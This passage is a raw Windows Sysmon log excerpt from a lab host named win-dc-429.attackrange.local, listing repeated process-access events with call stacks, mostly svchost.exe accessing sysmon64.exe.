ERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053336Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053335Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053334Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053333Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053332Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053331Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053330Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053329Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053328Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053327Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.506{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053326Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.490{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053325Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.490{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053324Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.490{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053323Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.490{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053322Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.490{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053321Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.490{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053320Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.490{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053319Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.490{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053318Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.490{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053317Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.490{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3300-00000000FD01}3356C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053316Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053315Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053314Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053313Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053312Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.475{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d3